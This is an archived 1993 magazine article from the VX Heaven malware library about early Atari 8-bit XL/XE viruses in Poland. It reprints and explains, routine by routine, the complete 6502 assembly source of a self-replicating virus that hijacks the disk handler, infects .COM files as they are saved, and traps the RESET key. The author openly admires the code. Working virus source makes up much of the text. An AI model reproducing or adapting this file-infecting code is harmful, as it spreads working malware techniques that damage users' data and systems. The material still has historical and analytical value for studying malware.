Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Atari 8-bit virus

Pirx
Mega Magazine #6
October 1993

[Back to index] [Comments]

"New software from Poland (har!)"

In one of the previous MegaZines were several articles with titles containing the word "virus". Of course my curiosity was infinite! "Viruses on our favourite microcomputer?" - I thought - "That cannot be true!". And I was right... Those articles were about compression and other, after all, interesting subjects. But something happened - people in Poland began to talk about those dangerous life-forms. First that was treated as a joke, but then one guy who writes games for Mirage Software accused the second one of damaging his precious data! That second guy, well known musician, was maintaining to have done nothing about erasing any data. And here that famous word appeared the first time in the serious circumstances. The word "VIRUS".

Yes, that is no joke - a real, dangerous virus caused the first blood flood the XL/XE world. At last, guys of Mirage "caught" it - this malicious piece of software was written in the very clever way. Located on the first page of the memory ($0100 - the stack area) it worked with almost all modern XL/XE systems (i.e. in those with QMEG OS) and surely on standart hardware. After every infection it was increasing the counter, and when it was equal to 10, the disk formating process was activated. The virus was so clever to do everything only during saving, when write protection was removed. I am not presenting the technical details because this evil-minded virus is very similar to the next one caught in Poland. Probably they have only one author...

The second one is very "popular" here since it's source code was published in Polish biggest XL/XE magazine (Tajemnice Atari - Mysterys of Atari), descripted with full particulars. And this is why I decided to translate partially this article, including ofcourse the source code. Unhappy this was written using Quick Assembler - the own invention of Avalon and Tajemnice Atari guys, but there should be no bigger troubles with converting it to one of the standart (macro)assemblers.

The descripted below virus has got only one purpose - to multiply itself - in it's code there are no destuctive sequences, but it doesn't mean it is safe. It causes extension of file lenght (may fullfil a disk faster, when expected) and may crash the system because of it's localisation - page six, which is heavily used by lots of applications. Our hero attacks only .COM files being saved on disk drive (only D: device). The only, wilful action of it is changing RESET vectors to SELF TEST address. On non-altered XL/XE system it is neccesary to turn off the computer (presing reset key causes jump to SELF TEST again). Most people do not like turning off ond on theirs micros and after such a experience they will seldom reach for the reset key. And the virus only waits for it, because reset kills that bad animal. Sometimes it can slow down the rate of disk operations, but now always - the virus is written by the real expert with the very good knowledge of XL/XE operating system. I needn't to mention that sometimes even the inconsiderable change in page six may cause a fail in I/O operations and damage of data on a disk.

And here comes the source code:

boot equ $09
dosi equ $0c
fcnt equ $1d
byte equ $1e
data equ $2f
htbs equ $31a
self equ $c901

     org $600

begn dta a(begn)
     dta a(begn+lght-1)
 

This strange beginning is a repetition of the DOS header, which is on the beginning of the binary code of the virus. Dos is not loading to the memory those headers and the virus must keep it itself in purpose to future multiply. dta a(begn) means .word begn in MAC65, for example.

main equ *
* 'D' entry search
     ldx #0
dsrc lda htbs,x
     cmp #'D'
     beq foun
     inx
     inx
     inx
     cpx #36
     bcc dsrc
     rts
* trap table address
foun lda #6  page six!
     cmp htbs+2,x
     beq retu
     ldy #1
ttlp lda htbs+2,x
     sta addr,y
     lda mtad,y
     sta htbs+2,x
     dex
     dey
     bpl ttlp
retu rts
 

The address of the former (OS) handler is saved inside the DOPR routine in purpose to continue I/O operations as if nothing happened. The virus doesn't care about previous value of DOSI and BOOT vectors, but it is made to cause troubles...

This is the end of the virus installation. It found address of "D:" handler and changed it to its own. This is not performed if there is no "D:" device or virus is already located on page 6. Now comes new I/O routines

*---- open

xopn lda <self>
     sta dosi
     lda >self
     sta dosi+1
     ldy #2
     sty fcnt
     dey
     sty boot
     bpl dopr
 

Every opening of file will cause setting BOOT to 1 - this warrants that after pressing RESET system will jump through DOSI vector. This is why one can not get away from SELF TEST mode (on standart machines, of course...). Also one very important counter (FCNT) is initialized. FCNT is then used to determine if file has on the beginning two $FF bytes (normally, only binary files have a header like this - $ff, $ff, <beg.adr,> beg.adr, <end.adr,> end.adr - those are so called .COM files (this is also known as DOS format)). On the end of the OPEN routine is jump to DOPR with 1 in Y register, what causes jump to original OPEN.

*---- put byte

xput ldy fcnt
     dey
     bmi gopu
     cmp #$ff
     beq *+4
     ldy #$ff
     sty fcnt
gopu ldy #7
     bpl dopr  (jmp)
 

Very interesting trick is used here: FCNT counter is equal zero after sending two $ff bytes. In any other occasion it is set to $ff. Both of those values prevents FCNT from changing in future. FCNT will serve as the file type flag in CLOSE routine. Jump to DOPR with 7 in Y will of course continue system put.

*---- close

xclo ldy fcnt
     bne gocl
     ldy #4
     sty byte
     jsr repl
     ldy #0
     sty fcnt
     ldy <lgth>
     sty byte
     jsr repl
     ldy <lgth-6>
     sty fcnt
     jsr repl
gocl ldy #3
     bpl dopr (jmp)
 

The close routine is simple but how efficient! The bacteria checks the file type and the current operation. For reading FCNT=2 and if the file is not .COM type, FCNT=$ff. Then the virus politely returns control to original CLOSE. But FCNT=0 means saving the file in DOS format. In this point all data of original file were succesfully transferred and now is time for multiplying! It's not easy because the bacteria must generate not only its'body but also a header and run addres, neccesary in the future life... As before, FCNT counter was cleverly used here: it is now equal to zero and points to the place from where copying will begin. The BYTE address fixes the end of the block for saving. The four bytes long block is copied twice to provide a header for DOS and a copy for future generations. The same is with the initialisation address at the end of the virus. Following routine saves one data block.

*---- body repl

loop inc fcnt
     lda begn,y
     jsr gopu
repl ldy fcnt
     cpy #byte
     bne  loop
     rts
 

It uses the PUT routine from original "D:" handler. Communication with that handler is performed by many times mentioned routine DOPR. For it the parameter (stored in Y register) is number of the older byte of the given address in a handler table (1 for OPEN, 3 for CLOSE, 5 for GET, and so on)

*---- do std proc

xget ldy #5
     bpl dopr  (jmp)
xsta ldy #9
     bpl dopr  (jmp)
xspe ldy #11
dopr sta data
xadr lda *,y
addr equ *-2
     pha
     dey
     tya
     ror *
     bcc xadr
     lda data
     rts
 

Give your attention to the original loop construction, which will be done two times everytime, independently from the Y value (only for the odd numbers). The ADDR label shows the argument of the previous LDA instuction (modified during installation - the first routine!)

*---- new table

mtad dta a(myta)
myta dta a(xopn-1)  0
     dta a(xclo-1)  2
     dta a(xget-1)  4
     dta a(xput-1)  6
     dta a(xsta-1)  8
     dta a(xspe-1)  a
 

XGET, XSTA and XSPE are directing all not used by the virus functions to the original "D:" handler.

*---- init vect

     dta a($2e2)
     dta a($2e3)
     dta a(main)

*---- total lenght

lgth equ *-begn
 

The virus' body ends with the above initialisation block (for next generation). The real initialisation is just after it:

*---- do it!

     org $2e2
     dta a(main)

     end
 

And that's all... Take care!!!! And notice the very advanced 6502 programming techniques! This piece of software is one of the most sophisticated programs I've ever seen...

I wish to thank Janusz B. Wisniewski for the original text (Tajemnice Atari 10/92). The translation was made WITHOUT author's permission and authorisation. But the subject is worth this little crime.... Thanks!

Pirx of Our 5oft

[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxer.org aka vx.netlux.org
deenesitfrplruua